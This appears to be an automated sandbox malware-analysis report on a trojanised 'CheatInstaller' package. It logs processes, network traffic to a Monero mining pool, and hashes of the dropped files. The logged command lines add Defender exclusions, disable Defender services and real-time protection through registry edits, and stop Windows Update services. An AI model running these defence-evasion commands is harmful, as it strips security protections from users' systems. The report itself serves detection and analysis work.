-NoProfile -Noninteractive -ExecutionPolicy Bypass -File "C:\Users\Admin\AppData\Local\Temp\pssF2C0.ps1" -propFile "C:\Users\Admin\AppData\Local\Temp\msiF2AD.txt" -scriptFile "C:\Users\Admin\AppData\Local\Temp\scrF2AE.ps1" -scriptArgsFile "C:\Users\Admin\AppData\Local\Temp\scrF2AF.txt" -propSep " :<->: " -lineSep " <<:>> " -testPrefix "_testValue."
C:\Windows\SysWOW64\PING.EXE
ping 127.0.0.1 -n 2
C:\Users\Admin\AppData\Local\Microwave\Vault\TelemetryHandlers\winupdates\winserverupd.exe
"C:\Users\Admin\AppData\Local\Microwave\Vault\TelemetryHandlers\winupdates\winserverupd.exe"
C:\Windows\System32\cmd.exe
"C:\Windows\sysnative\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\F3D1.tmp\F3D2.tmp\F3D3.bat C:\Users\Admin\AppData\Local\Microwave\Vault\TelemetryHandlers\winupdates\winserverupd.exe"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -command "Add-MpPreference -ExclusionPath "C:\Users\Admin\Appdata\Local" -Force"
C:\Windows\SysWOW64\PING.EXE
ping 127.0.0.1 -n 2
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -command "Add-MpPreference -ExclusionPath "C:\ProgramData" -Force"
C:\Windows\SysWOW64\PING.EXE
ping 127.0.0.1 -n 2
C:\Windows\SysWOW64\PING.EXE
ping 127.0.0.1 -n 2
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -command "Add-MpPreference -ExclusionPath "C:\Windows" -Force"
C:\Windows\SysWOW64\PING.EXE
ping 127.0.0.1 -n 2
C:\Windows\SysWOW64\PING.EXE
ping 127.0.0.1 -n 2
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -command "Add-MpPreference -AttackSurfaceReductionOnlyExclusions "C:\Users\Admin\Appdata\Local" -Force"
C:\Windows\SysWOW64\PING.EXE
ping 127.0.0.1 -n 2
C:\Windows\SysWOW64\PING.EXE
ping 127.0.0.1 -n 2
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -command "Add-MpPreference -ExclusionProcess "MsBuild.exe" -Force"
C:\Windows\SysWOW64\PING.EXE
ping 127.0.0.1 -n 2
C:\Windows\SysWOW64\PING.EXE
ping 127.0.0.1 -n 2
C:\Windows\system32\reg.exe
reg delete "HKLM\Software\Policies\Microsoft\Windows Defender" /f
C:\Windows\system32\reg.exe
reg add "HKLM\Software\Policies\Microsoft\Windows Defender\MpEngine" /v "MpEnablePus" /t REG_DWORD /d "0" /f
C:\Windows\system32\reg.exe
reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender Security Center\Notifications" /v "DisableNotifications" /t REG_DWORD /d "1" /f
C:\Windows\system32\reg.exe
reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender Security Center\Notifications" /v "DisableEnhancedNotifications" /t REG_DWORD /d "1" /f
C:\Windows\system32\reg.exe
reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableOnAccessProtection" /t REG_DWORD /d "1" /f
C:\Windows\SysWOW64\PING.EXE
ping 127.0.0.1 -n 2
C:\Windows\system32\reg.exe
reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableScanOnRealtimeEnable" /t REG_DWORD /d "1" /f
C:\Windows\system32\reg.exe
reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableBehaviorMonitoring" /t REG_DWORD /d "1" /f
C:\Windows\system32\reg.exe
reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Reporting" /v "DisableEnhancedNotifications" /t REG_DWORD /d "1" /f
C:\Windows\system32\reg.exe
reg add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "SpynetReporting" /t REG_DWORD /d "0" /f
C:\Windows\system32\reg.exe
reg add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "SubmitSamplesConsent" /t REG_DWORD /d "2" /f
C:\Windows\system32\reg.exe
reg add "HKLM\System\CurrentControlSet\Control\WMI\Autologger\DefenderApiLogger" /v "Start" /t REG_DWORD /d "0" /f
C:\Windows\system32\reg.exe
reg add "HKLM\System\CurrentControlSet\Control\WMI\Autologger\DefenderAuditLogger" /v "Start" /t REG_DWORD /d "0" /f
C:\Windows\system32\reg.exe
reg delete "HKCR\Directory\shellex\ContextMenuHandlers\EPP" /f
C:\Windows\system32\reg.exe
reg delete "HKCR\Drive\shellex\ContextMenuHandlers\EPP" /f
C:\Windows\system32\reg.exe
reg add "HKLM\System\CurrentControlSet\Services\WdBoot" /v "Start" /t REG_DWORD /d "4" /f
C:\Windows\system32\reg.exe
reg add "HKLM\System\CurrentControlSet\Services\WdFilter" /v "Start" /t REG_DWORD /d "4" /f
C:\Windows\system32\reg.exe
reg add "HKLM\System\CurrentControlSet\Services\WdNisDrv" /v "Start" /t REG_DWORD /d "4" /f
C:\Windows\system32\reg.exe
reg add "HKLM\System\CurrentControlSet\Services\WdNisSvc" /v "Start" /t REG_DWORD /d "4" /f
C:\Windows\system32\reg.exe
reg add "HKLM\System\CurrentControlSet\Services\WinDefend" /v "Start" /t REG_DWORD /d "4" /f
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -command "Set-MpPreference -PUAProtection disable" -Force"
C:\Windows\SysWOW64\PING.EXE
ping 127.0.0.1 -n 2
C:\Windows\Installer\MSI3D45.tmp
"C:\Windows\Installer\MSI3D45.tmp" /EnforcedRunAsAdmin /DontWait /HideWindow "C:\Users\Admin\AppData\Local\Microwave\Vault\TelemetryHandlers\winupdates\Narsil.exe"
C:\Windows\Installer\MSI3D65.tmp
"C:\Windows\Installer\MSI3D65.tmp" /EnforcedRunAsAdmin /DontWait /HideWindow "C:\Users\Admin\AppData\Local\Microwave\Vault\TelemetryHandlers\winupdates\SurrogateServerIntoSvc.exe"
C:\Windows\Installer\MSI3D76.tmp
"C:\Windows\Installer\MSI3D76.tmp" /EnforcedRunAsAdmin /DontWait /RunAsAdmin /HideWindow "C:\Users\Admin\AppData\Local\Microsoft\Vault\EdUpdMachine.exe"
C:\Users\Admin\AppData\Local\Microsoft\Vault\EdUpdMachine.exe
"C:\Users\Admin\AppData\Local\Microsoft\Vault\EdUpdMachine.exe"
C:\Users\Admin\AppData\Local\Microwave\Vault\TelemetryHandlers\winupdates\Narsil.exe
"C:\Users\Admin\AppData\Local\Microwave\Vault\TelemetryHandlers\winupdates\Narsil.exe"
C:\Users\Admin\AppData\Local\Microwave\Vault\TelemetryHandlers\winupdates\SurrogateServerIntoSvc.exe
"C:\Users\Admin\AppData\Local\Microwave\Vault\TelemetryHandlers\winupdates\SurrogateServerIntoSvc.exe"
C:\Windows\SysWOW64\PING.EXE
ping 127.0.0.1 -n 2
C:\Windows\SysWOW64\PING.EXE
ping 127.0.0.1 -n 2
C:\Windows\SysWOW64\PING.EXE
ping 127.0.0.1 -n 2
C:\Windows\SysWOW64\PING.EXE
ping 127.0.0.1 -n 2
C:\Windows\SysWOW64\PING.EXE
ping 127.0.0.1 -n 2
C:\Windows\SysWOW64\PING.EXE
ping 127.0.0.1 -n 2
C:\Windows\SysWOW64\PING.EXE
ping 127.0.0.1 -n 2
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -command "Set-MpPreference -HighThreatDefaultAction 6 -Force"
C:\Windows\SysWOW64\timeout.exe
timeout /t 10 /nobreak
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -command "Set-MpPreference -ModerateThreatDefaultAction 6 -Force"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -command "Set-MpPreference -LowThreatDefaultAction 6 -Force"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -command "Set-MpPreference -SevereThreatDefaultAction 6 -Force"
C:\Users\Admin\AppData\Local\Microsoft\Vault\EdUpdMachine.exe
C:\Users\Admin\AppData\Local\Microsoft\Vault\EdUpdMachine.exe
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -command "Set-MpPreference -ScanScheduleDay 8 -Force"
C:\Windows\System32\cmd.exe
C:\Windows\System32\cmd.exe /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc
C:\Windows\System32\sc.exe
sc stop UsoSvc
C:\Windows\System32\sc.exe
sc stop WaaSMedicSvc
C:\Windows\System32\sc.exe
sc stop wuauserv
C:\Windows\System32\sc.exe
sc stop bits
C:\Windows\System32\sc.exe
sc stop dosvc
C:\Windows\System32\cmd.exe
C:\Windows\System32\cmd.exe /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 0
C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe
C:\Windows\System32\powercfg.exe
powercfg /x -hibernate-timeout-ac 0
C:\Windows\System32\powercfg.exe
powercfg /x -hibernate-timeout-dc 0
C:\Windows\System32\powercfg.exe
powercfg /x -standby-timeout-ac 0
C:\Windows\System32\powercfg.exe
powercfg /x -standby-timeout-dc 0
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -command "Set-MpPreference -DisableCatchupFullScan 1 -Force"
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | 173.178.17.96.in-addr.arpa | udp |
| US | 8.8.8.8:53 | raw.githubusercontent.com | udp |
| US | 185.199.108.133:443 | raw.githubusercontent.com | tcp |
| US | 8.8.8.8:53 | 133.108.199.185.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 21.236.111.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 200.178.17.96.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 208.143.182.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | xmr.2miners.com | udp |
| DE | 162.19.139.184:12222 | xmr.2miners.com | tcp |
| US | 8.8.8.8:53 | 184.139.19.162.in-addr.arpa | udp |
Files
C:\Users\Admin\AppData\Local\Temp\7zSB381.tmp\node_modules\@isaacs\cliui\node_modules\emoji-regex\es2015\text.js
| MD5 | 12148d2dff9ca3478e4467945663fa70 |
| SHA1 | 50998482c521255af2760ed95bbdb1c4f7387212 |
| SHA256 | 1fb82c82d847ebc4aa287f481ff67c8cc9bde03149987b2d43eb0dee2a5160b6 |
| SHA512 | f9f6a61af37d1924e3a9785aa04a33fa0107791d54cb07663c6ea8a68edfae3766682e914b6afaf198eb97c7f73ab53aa500b4661cdabdebd2576526664166f4 |
C:\Users\Admin\AppData\Local\Temp\7zSB381.tmp\node_modules\@isaacs\cliui\node_modules\emoji-regex\text.js
| MD5 | 7b33dd38c0c08bf185f5480efdf9ab90 |
| SHA1 | b3d9d61ad3ab1f87712280265df367eff502ef8b |
| SHA256 | d1e41c11aa11e125105d14c95d05e1e1acd3bede89429d3a1c12a71450318f88 |
| SHA512 | 22da641c396f9972b136d4a18eb0747747252cf7d5d89f619a928c5475d79375fbbe42d4e91821102e271ea144f89267ff307cd46494fdf7d6002ce9768b7bd9 |
C:\Users\Admin\AppData\Local\Temp\7zSB381.tmp\node_modules\@isaacs\cliui\node_modules\strip-ansi\license
| MD5 | d5f2a6dd0192dcc7c833e50bb9017337 |
| SHA1 | 80674912e3033be358331910ba27d5812369c2fc |
| SHA256 | 5c932d88256b4ab958f64a856fa48e8bd1f55bc1d96b8149c65689e0c61789d3 |
| SHA512 | d1f336ff272bc6b96dc9a04a7d0ef8f02936dd594f514060340478ee575fe01d55fc7a174df5814a4faf72c8462b012998eca7bb898e3f9a3e87205fb9135af2 |
C:\Users\Admin\AppData\Local\Temp\7zSB381.tmp\node_modules\@npmcli\query\LICENSE
| MD5 | c637d431ac5faadb34aff5fbd6985239 |
| SHA1 | 0e28fd386ce58d4a8fcbf3561ddaacd630bc9181 |
| SHA256 | 27d998b503b18cdb16c49e93da04069a99ba8a1d7e18d67146de8e242f9a6d21 |
| SHA512 | a4b744c1d494fcc55cd223c8b7b0ad53f3637aac05fe5c9a2be41c5f5e117610c75a323c7745dfeae0db4126f169c2b7b88649412b6044ba4a94e9a4d8d62535 |
C:\Users\Admin\AppData\Local\Temp\7zSB381.tmp\node_modules\@npmcli\run-script\LICENSE
| MD5 | 89966567781ee3dc29aeca2d18a59501 |
| SHA1 | a6d614386e4974eef58b014810f00d4ed1881575 |
| SHA256 | 898c2bcff663681498ad1ca8235d45b6e70b10cdf1f869a5b5e69f6e46efedd3 |
| SHA512 | 602dd09be2544542a46083e71a6e43fefc99eb884bdd705f629f8b4bf49192c6f8c482cd6a490397afde100be9347524079abb4c6d18bda3f64cf2fb77d2fe4c |
C:\Users\Admin\AppData\Local\Temp\7zSB381.tmp\node_modules\@sigstore\sign\dist\types\fetch.js
| MD5 | 8963201168a2449f79025884824955f2 |
| SHA1 | b66edae489b6e4147ce7e1ec65a107e297219771 |
| SHA256 | d43aa81f5bc89faa359e0f97c814ba25155591ff078fbb9bfd40f8c7c9683230 |
| SHA512 | 7f65c6403a23d93fb148e8259b012d6552ab3bff178f4a7d6a9d9cec0f60429fc1899e39b4bca8cc08afc75d9a7c7bfdb13fc372ca63c85eb22b0355eb4d6000 |
C:\Users\Admin\AppData\Local\Temp\7zSB381.tmp\node_modules\@sigstore\sign\LICENSE
| MD5 | f03382535cd50de5e9294254cd26acba |
| SHA1 | d3d4d2a95ecb3ad46be7910b056f936a20fefacf |
| SHA256 | 364a130d2ca340bd56eb1e6d045fc6929bb0f9d0aa018f2c1949b29517e1cdd0 |
| SHA512 | bbbbee42189d3427921409284615e31346bdbd970a6939bc1fe7f8eaed1903d9ad0534ddf7283347d406fa439d8559fbf95c6755ece82e684e456fce2b227016 |
C:\Users\Admin\AppData\Local\Temp\7zSB381.tmp\node_modules\ansi-styles\license
| MD5 | 915042b5df33c31a6db2b37eadaa00e3 |
| SHA1 | 5aaf48196ddd4d007a3067aa7f30303ca8e4b29c |
| SHA256 | 48da2f39e100d4085767e94966b43f4fa95ff6a0698fba57ed460914e35f94a0 |
| SHA512 | 9c8b2def76ae5ffe4d636166bf9635d7abd69cdac4bf819a2145f7969646d39ae95c96364bc117f9fa544b98518c294233455d4f665af430c75d70798dd4ab13 |
C:\Users\Admin\AppData\Local\Temp\7zSB381.tmp\node_modules\cross-spawn\node_modules\which\LICENSE
| MD5 | 82703a69f6d7411dde679954c2fd9dca |
| SHA1 | bb408e929caeb1731945b2ba54bc337edb87cc66 |
| SHA256 | 4ec3d4c66cd87f5c8d8ad911b10f99bf27cb00cdfcff82621956e379186b016b |
| SHA512 | 3fa748e59fb3af0c5293530844faa9606d9271836489d2c8013417779d10cc180187f5e670477f9ec77d341e0ef64eab7dcfb876c6390f027bc6f869a12d0f46 |
C:\Users\Admin\AppData\Local\Temp\7zSB381.tmp\node_modules\emoji-regex\LICENSE-MIT.txt
| MD5 | ee9bd8b835cfcd512dd644540dd96987 |
| SHA1 | d7384cd3ed0c9614f87dde0f86568017f369814c |
| SHA256 | 483acb265f182907d1caf6cff9c16c96f31325ed23792832cc5d8b12d5f88c8a |
| SHA512 | 7d6b44bb658625281b48194e5a3d3a07452bea1f256506dd16f7a21941ef3f0d259e1bcd0cc6202642bf1fd129bc187e6a3921d382d568d312bd83f3023979a0 |
C:\Users\Admin\AppData\Local\Temp\7zSB381.tmp\node_modules\inflight\LICENSE
| MD5 | 90a3ca01a5efed8b813a81c6c8fa2e63 |
| SHA1 | 515ec4469197395143dd4bfe9b1bc4e0d9b6b12a |
| SHA256 | 05dc4d785ac3a488676d3ed10e901b75ad89dafcc63f8e66610fd4a39cc5c7e8 |
| SHA512 | c9d6162bef9880a5ab6a5afe96f3ec1bd9dead758ca427f9ba2e8e9d9adaaf5649aad942f698f39b7a9a437984f8dc09141f3834cd78b03104f81ad908d15b31 |
C:\Users\Admin\AppData\Local\Temp\7zSB381.tmp\node_modules\minimatch\dist\cjs\package.json
| MD5 | df9ffc6aa3f78a5491736d441c4258a8 |
| SHA1 | 9d0d83ae5d399d96b36d228e614a575fc209d488 |
| SHA256 | 8005a3491db7d92f36ac66369861589f9c47123d3a7c71e643fc2c06168cd45a |
| SHA512 | 6c58939da58f9b716293a8328f7a3649b6e242bf235fae00055a0cc79fb2788e4a99dfaa422e0cfadbe84e0d5e33b836f68627e6a409654877edc443b94d04c4 |
C:\Users\Admin\AppData\Local\Temp\7zSB381.tmp\node_modules\minimatch\dist\mjs\package.json
| MD5 | d0707362e90f00edd12435e9d3b9d71c |
| SHA1 | 50faeb965b15dfc6854cb1235b06dbb5e79148d2 |
| SHA256 | 3ca9d4afd21425087cf31893b8f9f63c81b0b8408db5e343ca76e5f8aa26ab9a |
| SHA512 | 9d323420cc63c6bee79dcc5db5f0f18f6b8e073daaf8ffa5459e11f2de59a9f5e8c178d77fa92afc9ddd352623dec362c62fff859c71a2fab93f1e2172c4987f |
C:\Users\Admin\AppData\Local\Temp\7zSB381.tmp\node_modules\minipass\dist\commonjs\package.json
| MD5 | 95b08bc3062cdc4b0334fa9be037e557 |
| SHA1 | a6e024bc66f013d9565542250aef50091391801d |
| SHA256 | fa6944a20ca5e6fbaf98fd202eb8c7004d5b4ab786e36b9ed02ee31dbe196c9f |
| SHA512 | 65c66458abe2101032cdd1b50ca6e643e0c368d09dfa6cc7006b33ed815e106bb20f9aff118181807e7df9f5d4d8d9796709b1ec9a7e04544231636fdf8fdf42 |
C:\Users\Admin\AppData\Local\Temp\7zSB381.tmp\node_modules\minipass\dist\esm\package.json
| MD5 | 6138da8f9bd4f861c6157689d96b6d64 |
| SHA1 | ee2833a41c28830d75b2f3327075286c915ed0dd |
| SHA256 | 6dc1b06d6b093e9cccb20bee06a93836eee0420ae26803ca2ce4065d82f070d1 |
| SHA512 | 0a3f1cb1522c6e7595186a9a54ed073ffa590b26c7d31b0877f19c925f847037e9f972066bfed62609b190eb2bc21ff7b31514e08c3de64780fef5982cbb21f2 |
C:\Users\Admin\AppData\Local\Temp\7zSB381.tmp\node_modules\minipass-json-stream\node_modules\minipass\index.js
| MD5 | a8c344ac3d111b646df0dcae1f2bc3a3 |
| SHA1 | d8a136b49214e498da9c5a6e8cb9681b4fda3149 |
| SHA256 | dbc5220c4bc8b470da9c8e561b6a5382cf3fa9dcd97cace955ac6fd34a27970c |
| SHA512 | 523749e4d38585249f1e3d7cfb2cb23e7f76764b36d0a628f48ff6b50f0a08c8e8526a1236977da1bd4ac0ff0bd8d0ba9b834324f2bdef9bea9394dd6878c51d |
C:\Users\Admin\AppData\Local\Temp\7zSB381.tmp\node_modules\minipass-json-stream\node_modules\minipass\LICENSE
| MD5 | 78e0c554693f15c5d2e74a90dfef3816 |
| SHA1 | 58823ce936d14f068797501b1174d8ea9e51e9fe |
| SHA256 | a5a110eb524bf3217958e405b5e3411277e915a2f5902c330348877000337e53 |
| SHA512 | b38ebcf2af28488dbf1d3aa6a40f41a8af4893ad6cb8629125e41b2d52c6d501283d882f750fc8323517c4eb3953d89fa0f3c8ceba2ae66a8bf95ae676474f09 |
C:\Users\Admin\AppData\Local\Temp\7zSB381.tmp\node_modules\minipass-json-stream\node_modules\minipass\package.json
| MD5 | 1943a368b7d61cc3792a307ec725c808 |
| SHA1 | fc79b496665e2cdfc4bdaac9c7d7c4b2f4645f2c |
| SHA256 | e99f6b67ba6e5cda438efb7a23dd399ee5c2070af69ce77720d95de5fb42921e |
| SHA512 | 7c05f03f5d3db01798c56c50d21628fc677097630aacf92e9ea47e70ff872d0e4e40217c1c2d5e81fc833ccf5afe9697f8f20a4772459b396aa5c85263289223 |
C:\Users\Admin\AppData\Local\Temp\7zSB381.tmp\node_modules\node-gyp\node_modules\are-we-there-yet\LICENSE.md
| MD5 | 1750b360daee1aa920366e344c1b0c57 |
| SHA1 | fe739dc1a14a033680b3a404df26e98cca0b3ccf |
| SHA256 | 7f75bb21103e77b7acfcf88a6ad0286741a18b5d13c4326160346e8cf7e356ad |
| SHA512 | ff2486d589d32fb35aad9c02cd917ba1e738ca16b7ccc7954cdc4712a968fc5fc25612b489f962cbe8ddb2be40057cd1b59402aa9cade9b6479a1d0e1d7743a4 |
C:\Users\Admin\AppData\Local\Temp\7zSB381.tmp\node_modules\node-gyp\node_modules\minipass\LICENSE
| MD5 | 5f114ac709a085d123e16c1e6363793f |
| SHA1 | 185c2ab72f55bf0a69f28b19ac3849c0ca0d9705 |
| SHA256 | 833faa18ac4b83a6372c05b3643d0d44ecd27d6627b8cd19b0f48fe74260cf39 |
| SHA512 | cab00a78e63dec76fa124fc49d1c28962d674fa18dda5fdf2819078bd932f1bf0cc9abd741b78f62869b4809473099f85ba8a622bc96f4ee92cf11b564346597 |
C:\Users\Admin\AppData\Local\Temp\7zSB381.tmp\node_modules\npm-audit-report\LICENSE
| MD5 | 5324d196a847002a5d476185a59cf238 |
| SHA1 | dfe418dc288edb0a4bb66af2ad88bd838c55e136 |
| SHA256 | 720836c9bdad386485a492ab41fe08007ecf85ca278ddd8f9333494dcac4949d |
| SHA512 | 1b4187c58bebb6378f8a04300da6f4d1f12f6fbe9a1ab7ceda8a4752e263f282daebcac1379fa0675dd78ec86fffb127dba6469f303570b9f21860454df2203f |
C:\Users\Admin\AppData\Local\Temp\7zSB381.tmp\node_modules\read-package-json-fast\LICENSE
| MD5 | ff53df3ad94e5c618e230ab49ce310fa |
| SHA1 | a0296af210b0f3dc0016cb0ceee446ea4b2de70b |
| SHA256 | ec361617c0473d39347b020eaa6dceedaebab43879fa1cd8b8f0f97a8e80a475 |
| SHA512 | 876b0bd6a10f852661818d5048543bb37389887bf721016b6b7d1fa6d59d230d06f8ff68a59a59f03c25fbc80a2cbb210e7ca8179f111ecd10929b25b3d5cdfe |
C:\Users\Admin\AppData\Local\Temp\7zSB381.tmp\node_modules\text-table\LICENSE
| MD5 | aea1cde69645f4b99be4ff7ca9abcce1 |
| SHA1 | b2e68ce937c1f851926f7e10280cc93221d4f53c |
| SHA256 | 435a6722c786b0a56fbe7387028f1d9d3f3a2d0fb615bb8fee118727c3f59b7b |
| SHA512 | 518113037ee03540caae63058a98525f9a4a67425bd8c3596f697bed5ae1d2053fe76f76b85a4eefb80cc519f7b03d368cf4b445288c4ca7cacb5e7523f33962 |
C:\Users\Admin\AppData\Local\Temp\7zSB381.tmp\node_modules\tuf-js\LICENSE
| MD5 | 391090fcdb3d37fb9f9d1c1d0dc55912 |
| SHA1 | 138f23e4cc3bb584d7633218bcc2a773a6bbea59 |
| SHA256 | 564bcb001d6e131452a8e9fba0f0ccc59e8b881f84ce3e46e319a5a33e191e10 |
| SHA512 | 070121c80cd92001196fb15efb152188c47fdc589b8f33b9da5881aa9470546b82cb8a8ea96fe1073723f47149e184f1a96c2777a9fc9b45af618c08464d6c5e |
C:\Users\Admin\AppData\Local\Temp\7zSB381.tmp\node_modules\wide-align\LICENSE
| MD5 | 9d215c9223fbef14a4642cc450e7ed4b |
| SHA1 | 279f47bedbc7bb9520c5f26216b2323e8f0e728e |
| SHA256 | 0cef05dfff8b6aa7f35596984f5709f0d17c2582924a751efa471a76de7cdc11 |
| SHA512 | 5e4ba806f279089d705e909e3c000674c4186d618d6ab381619099f8895af02979f3fc9abb43f78b9ffed33b90a7861f6c4b9d6c1bb47ed14a79e7f90eca833c |
C:\Users\Admin\AppData\Local\Temp\7zSB381.tmp\Install_YTTCHTs.exe
| MD5 | b86013bc1a4c11e0db3284d72279c44b |
| SHA1 | debbf2953b43f55f47b76dc487406345733f3150 |
| SHA256 | b13f7407789e12149e79c43761407fdf4723e2741d555c89b4f9f51cf1006583 |
| SHA512 | d477021586938a277f4d8e322e67d7d67eb64c70de19bf22a4f0c3d7d8c6e63467c8c2931734d90ab6f06ef2657d024075c8f641def2fffd55ce98559939c311 |
C:\Users\Admin\AppData\Local\Temp\7zSB381.tmp\Install_YTTCHTs.exe
| MD5 | 866cdaee439b2f7259b74972346b612a |
| SHA1 | 2c6492069897241424cf1452f2a683afc6daf3a2 |
| SHA256 | 31d3f0242af3dc943b55ca910d0b229dd5a0e84c6383771a074b60f053529c1f |
| SHA512 | 76d667ce1a51aa637da85e25edfc443339b7d8c2708e821b0eff4c00802a8facfa5bee432d005c54164232c286429a2f9cfea3041fcfd2d9537d03fe82ab490b |
C:\Users\Admin\AppData\Roaming\OpenSource\CheatInstaller 2.32\install\E957A1C\YTtSTCHEAT.msi
| MD5 | 88d6ef66043282511d78477c3457cd05 |
| SHA1 | dedf2529b0f78f9d7dfe5519d080fe1d11fb0344 |
| SHA256 | 82efcbda4a568f2e898f2c97d3876af8c4c42f2638a339b937b01202bb83fb4a |
| SHA512 | 506e03b18e11c6133eb4b997bfd017ab5e5ed7a253e0470ee391d8bf5f86196742b57ec03316f1d5699f7a2f556df38468c539a6ff70c52e092bf0c1de61fa2b |
C:\Users\Admin\AppData\Local\Temp\MSIF195.tmp
| MD5 | c9c085c00bc24802f066e5412defcf50 |
| SHA1 | 557f02469f3f236097d015327d7ca77260e2aecc |
| SHA256 | a412b642de0e94db761ebd2834dde72eed86e65fc4a580670a300015b874ba24 |
| SHA512 | a6fa1f34cd630a7509a6441be7ad060de7e039967d2ec015e27c2a643b04e0eecf53902b7173c4c2e92e3a890bd7acb6a3307d9923838f0bfc71496fb184b1de |
C:\Users\Admin\AppData\Local\Temp\MSIF3AA.tmp
| MD5 | 6bb65410717bb2c62ed92cdbc9c41652 |
| SHA1 | 1f0d56a24588c0c07e878f348df6bb0c3e4f693a |
| SHA256 | 91a6c5daebe89b7d9157188a2b3fa8e47d53b4d20c29bcc244635d1943397f7b |
| SHA512 | 1a864c6d010e3d62337a2067f53e82067ab01a556edee65036658bb7dd863bf22379d16aaf6385fda23060148c68c7225610058a153420e7b125c038285ceb38 |
C:\Windows\Installer\MSIFE79.tmp
| MD5 | a8338e7b3ce49ab7e793952765ac998f |
| SHA1 | 29a2dd67eba553530f84f9e02266474ea678abdd |
| SHA256 | 6fa584e22fc546b95fa757279ce5569e5540bf2ac28b138adba41877fe0c645d |
| SHA512 | 85c5095099f7a689e5dd125ad8805b90f59a0e4a930ea791383a596e722d56fa62e4f85c28365c01a6ef2c3b4ddd0e53eb6a70777ad94070b49602993497a64f |
memory/1864-3595-0x0000016AB7370000-0x0000016AB7392000-memory.dmp
memory/1864-3598-0x0000016A9EC90000-0x0000016A9ECA0000-memory.dmp
memory/1864-3597-0x00007FF90FA80000-0x00007FF91046C000-memory.dmp
memory/1864-3600-0x0000016A9EC90000-0x0000016A9ECA0000-memory.dmp
memory/1864-3601-0x0000016AB7520000-0x0000016AB7596000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\pssFF91.ps1
| MD5 | a8a3a992fce81410c5771c10f743f6ba |
| SHA1 | d0dd0c52514afa2150b250e549dfebf87758f191 |
| SHA256 | bd580ea3519d7b9c2bc34d30b66af13f580ee5beb1ce828499f607300dbd9bee |
| SHA512 | 3edf26ba7095e2532cd0257f50a65c9f71eb85b768f27237f0bf538409cea74e12bbcec01bc0120f9d53bfb6a94b4bac21a17595e259ee23d1a36fbf4615c830 |
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_tccedvs1.jrm.ps1
| MD5 | c4ca4238a0b923820dcc509a6f75849b |
| SHA1 | 356a192b7913b04c54574d18c28d46e6395428ab |
| SHA256 | 6b86b273ff34fce19d6b804eff5a3f5747ada4eaa22f1d49c01e52ddb7875b4b |
| SHA512 | 4dff4ea340f0a823f15d3f4f01ab62eae0e5da579ccb851f8db9dfe84c58b2b37b89903a740e1ee172da793a6e79d560e5f7f9bd058a12a280433ed6fa46510a |
C:\Users\Admin\AppData\Local\Temp\scrFF7F.ps1
| MD5 | b4aaf8eaa1aa2477670ed54128e2c742 |
| SHA1 | b756fb677993bcf92916be8979052ed14a6170da |
| SHA256 | 5a4a897b8e922880f81b7ad94877acf3b394fffc1811d8826035b33d383624ba |
| SHA512 | 078503e1424578aa7a6791d1c962b801c1066958851d04ec4b8e24fc4ac5eecb4c013dc8484d04b5a5177a8bded08ba743f98ac69c656f7b79039fc8d1d7c55f |
C:\Users\Admin\AppData\Local\Temp\scrFF80.txt
| MD5 | 64d1817b6bfcd6cfda309f8910f51b57 |
| SHA1 | 9faf2d4a707b789de6970b53b0dc80ac47ec3c52 |
| SHA256 | 067838889a9eeb91ecb3fc155f3bfed21bd86d8c789d6485cca2a6d6a6bd4391 |
| SHA512 | d51ec763f8f2920782d958c84a5fb96d7e80382d88bc9a41ec0ca6e2570ebb328389ead37e4042c83d025a1e3580444f6374ffa015374d6c20c75f9ec85ba7ee |
C:\Users\Admin\AppData\Local\Temp\progressbad.bat
| MD5 | d3dff05f50e0edcecca77d97468a1aef |
| SHA1 | 87a217697bd981c8a9dc5a94ae65daf3ece5f081 |
| SHA256 | 86cad2a008f8a7be294be384100f6c0cc0cc4bbdb154174b81ea8c61bc85748e |
| SHA512 | 0b897b0697b3beb69dbe22db514ce53f3fb0b456fc14b79e4719b840bf17165a594a052230f2242647cf0fc047b4066461aa5af5289d5869926d16189dc8f005 |
memory/1864-3701-0x0000016A9EC90000-0x0000016A9ECA0000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\progressgood.bat
| MD5 | 845cf6630a4a8d184f93d0f732feb846 |
| SHA1 | 1d9219177aaf25e5a95bdc72ec8cd6fd42e6cace |
| SHA256 | 19f3274b5b004259d609e624e54259d1637074a97ab7e6452ddd2bd81ee29153 |
| SHA512 | bb6e45187eb464ba6eec05c368ea13c43667307804b10215b5753209fb8d1cdacf0b1fb3460849069211ac76b8706c772f85704b7b7361626798cce373bdac1e |
